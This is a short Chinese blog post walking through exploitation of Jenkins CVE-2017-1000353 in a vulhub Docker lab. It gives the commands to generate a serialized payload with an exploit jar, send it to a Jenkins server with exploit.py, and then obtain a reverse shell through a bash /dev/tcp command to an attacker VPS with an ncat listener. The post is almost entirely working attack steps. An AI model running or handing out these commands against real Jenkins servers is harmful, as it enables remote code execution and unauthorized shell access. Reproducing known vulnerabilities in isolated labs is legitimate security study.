jenkins-CVE-2017-1000353复现以及反弹SHELL

工具:
CVE-2017-1000353-1.1-SNAPSHOT-all.jar
 
exploit.py
 
在vulhub搭建镜像:
https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/
下载完在目录中运行:
docker-compose up -d
主机访问:
执行下面命令生成字节码文件:
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
# jenkins_poc.ser是生成的字节码文件名
# "touch ..."是待执行的任意命令
 
python3执行命令发送字节码:
python exploit.py http://your-ip:8080 jenkins_poc.ser
去查看验证:
 
 
进阶:反弹shell(这是网上教程没有的)
在VPS上开启一个监听:
ncat -lvvp 4444
反弹shell的命令:
/bin/bash -i > /dev/tcp/你的ip/4444 0>&1 2>&1
直接替换上面的命令是不行的,需要去这里转换一下:
http://www.jackson-t.ca/runtime-exec-payloads.html
然后用生成的命令替换上面的命令生成字节码:
去VPS看,成功拿到shell:
 
教程结束
 
posted @ 2021-03-11 12:54  千载梦悠  阅读(957)  评论(0)    收藏  举报